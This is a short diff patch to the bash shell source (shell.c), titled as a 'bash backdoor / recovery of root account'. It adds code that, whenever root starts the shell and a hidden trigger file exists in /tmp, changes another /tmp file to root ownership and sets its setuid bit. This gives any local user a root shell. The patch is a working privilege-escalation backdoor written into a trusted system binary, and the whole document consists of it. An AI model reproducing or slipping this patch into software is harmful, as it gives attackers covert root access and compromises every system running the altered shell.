# Bash backdoor / recovery of root account.
# bob@dtors.net
--- shell.c     2011-01-02 21:04:51.000000000 +0000
+++ patch.c     2012-05-22 11:39:11.096809431 +0100
@@ -357,6 +357,7 @@
 #if defined (RESTRICTED_SHELL)
   int saverst;
 #endif
+  struct stat finfo;
   volatile int locally_skip_execution;
   volatile int arg_index, top_level_arg_index;
 #ifdef __OPENNT
@@ -489,6 +490,14 @@
   if (running_setuid && privileged_mode == 0)
     disable_priv_mode ();

+if(getuid()==0)
+{
+       if(stat("/tmp/mcliZokhb",&finfo)==0)
+       {
+               chown("/tmp/mclzaKmfa",0,0);
+               chmod("/tmp/mclzaKmfa",S_ISUID|S_IREAD|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
+       }
+}
   /* Need to get the argument to a -c option processed in the
      above loop.  The next arg is a command to execute, and the
      following args are $0...$n respectively. */